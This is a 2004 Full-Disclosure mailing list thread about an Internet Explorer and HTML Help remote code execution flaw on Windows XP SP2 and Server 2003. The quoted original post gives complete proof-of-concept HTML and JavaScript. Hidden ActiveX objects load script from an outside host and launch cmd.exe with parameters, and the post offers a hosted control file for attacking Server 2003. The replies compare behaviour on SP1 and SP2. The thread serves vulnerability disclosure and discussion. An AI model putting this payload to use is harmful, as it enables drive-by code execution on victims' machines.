Re: Windows (XP SP2) Remote code executionwithparameters

["Rafel Ivgi" <rivgi () finjan com>]

hhctrl.ocx is not installed by default in all SP1s but is on all SP2.
Therefore when the exploit page tries to create the object he cannot
find it so it tries to install it. On SP2 it exists by default therefore
created silently.

Rafel Ivgi
Security Consultant
Malicious Code Research Center (MCRC)
Finjan Software LTD
E-mail: rivgi () Finjan com
---------------------------------
Prevention is the best cure!
----- Original Message ----- 
From: "morning_wood" <se_cur_ity () hotmail com>
To: "ShredderSub7 SecExpert" <shreddersub7 () hotmail com>;
<full-disclosure () lists netsys com>
Sent: Tuesday, December 28, 2004 8:13 AM
Subject: Re: [Full-disclosure] Windows (XP SP2) Remote code
executionwithparameters


> On my SP1 system I get a dialog asking if i want to install "hhctrl.ocx"
> other than that, nothing happens, no fles dropped, nothing unusual. ( of
> course i closed the dialog
> for hhctrl.ocx installer ). The file "ntshared.chm" does exist in
> C:\windows\help.
> I have no "unusual" security settings or 3rd party software blocking
> scripts/activex.
>
> hmm?
>
> m.w
>
> ----- Original Message ----- 
> From: "ShredderSub7 SecExpert" <shreddersub7 () hotmail com>
> To: <full-disclosure () lists netsys com>
> Sent: Monday, December 27, 2004 4:24 PM
> Subject: [Full-disclosure] Windows (XP SP2) Remote code execution
> withparameters
>
>
> > PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
> > Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm
> >
> > ------------------Which systems are vulnerable?--------
> > Any system running any Microsoft Windows XP edition with Internet
> > Explorer
> 6
> > or higher, even with SP2 applied.
> > Any system running any Microsoft Windows Server 2003 edition with
> > Internet
> > Explorer 6 or higher.
> >
> > ------------------How does this exploit work?-----------
> > The problem with Internet Explorer is that it doesn't set any
> > restrictions
> > on web pages that request opening a Windows Help file, compiled with HTML
> > Help. Without a restriction, we can (in Internet Explorer) easily command
> to
> > open any local web page stored on a victim's computer, including web
> > pages
> > that are founded in Windows Help files (with extension .CHM). In this PoC
> > (Proof of Concept, see below for viewing the PoC), the web page
> > "alt_url_enterprise_specific.htm" (that is founded in the Windows Help
> file
> > "ntshared.chm") will be opened in the HTML Help program "hh.exe".
> > Since we now opened a web page stored in a Windows Help file (.CHM), it
> > is
> > possible (thanks to the exploit) to execute a HTML Help control (in this
> > case, an ActiveX control) that only fully works in Help files. So in this
> > PoC, we choosed to launch an ActiveX control for HTML Help. Then, this
> > ActiveX control will execute any program we want, in this example that's
> > "cmd.exe".
> >
> > Thanks to the exploit, it is even possible to add parameters to the
> executed
> > program (here: cmd.exe), so that you can easily start malware out of
> > "cmd.exe". In this PoC, we added the parameter "/c pause" to the
> > execution
> > code "cmd.exe", and the result is a DOS Prompt with the text "Press any
> key
> > to continue. . .".
> >
> > To make it complete, the 2 needed programs (Internet Explorer and HTML
> Help)
> > will be automatically shutted down after the execution is finished. In
> this
> > PoC, HTML Help and Internet Explorer will be automatically closed after
> the
> > execution, without user interaction.
> >
> > ------------------How can you reproduce this PoC?------------------
> > Create the file "htm.htm" with the following code (please notice that you
> > may want to modify the full path to the file "htm.txt"):
> > --------------
> > &lt;html&gt;<head><title>CMDExe - Windows Exploit - Remote code execution
> > with parameters - Proof of Concept</title></head><body>
> > <br>&lt;OBJECT style="display:none" id="locate"
> > type="application/x-oleobject"
> > classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> > codebase="hhctrl.ocx#Version=5,2,3790,1194"&gt;
> > <PARAM name="Command" value="Related Topics, MENU">
> > <PARAM name="Button" value="Text:_">
> > <PARAM name="Window" value="$global_blank">
> > <PARAM name="Item1"
> value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_spec
> ific.htm">
> > </OBJECT>
> > <OBJECT style="display:none" id="locator" type="application/x-oleobject"
> > classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> > codebase="hhctrl.ocx#Version=5,2,3790,1194">
> > <PARAM name="Command" value="Related Topics, MENU">
> > <PARAM name="Button" value="Text:_">
> > <PARAM name="Window" value="$global_blank">
> > <PARAM name="Item1"
> > value='command;javascript:execScript("document.write(\"<script
> > language=\\\"javascript\\\"
> src=\\\"http://www.freewebs.com/shreddersub7/htm.txt\\\"\"+String.fromCharCo
> de(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
> > </OBJECT>
> &lt;script&gt;locate.HHClick();setTimeout("locator.HHClick()",100);setTimeou
> t("window.opener=null;window.close()",10000)&lt;/script&gt;</body>&lt;/html&
> gt;
> > --------------
> >
> > Then create the file "htm.txt" (please notice that you may have to change
> > the full path to your specified program, in this case "cmd.exe"):
> > --------------
> > document.write("<object id=a
> > classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command
> > value=shortcut><param name=item1 value=',cmd.exe,/c
> pause,'></object><object
> > id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
> name=command
> > value=close></object><script>a.Click\(\);b.Click\(\)</script>");
> > --------------
> >
> > If you want to attack Windows Server 2003 systems, you also need to
> > upload
> > the "hhctrl.ocx" file (http://www.freewebs.com/shreddersub7/hhctrl.ocx)
> >
> > --------------How to avoid this exploit...-------------
> > Since there are no patches from Microsoft available yet, here are some
> > (temporary?) solutions:  Disable Internet Explorer
> > or disable Active Scripting (HOW?).
> > OR Use another browser,for example Mozilla FireFox.
> >
> > More info (like credits, things that are included etc.) about this
> > exploit
> > can be found at http://www.freewebs.com/shreddersub7/expl-discuss.htm
> >
> > Contact: ShredderSub7_at_hotmail.com
> >
> > _________________________________________________________________
> > Onze vernieuwde gezondheidsrubriek al gezien?
> > http://www.msn.be/gezondheid
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


-----------------------------------------------
This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html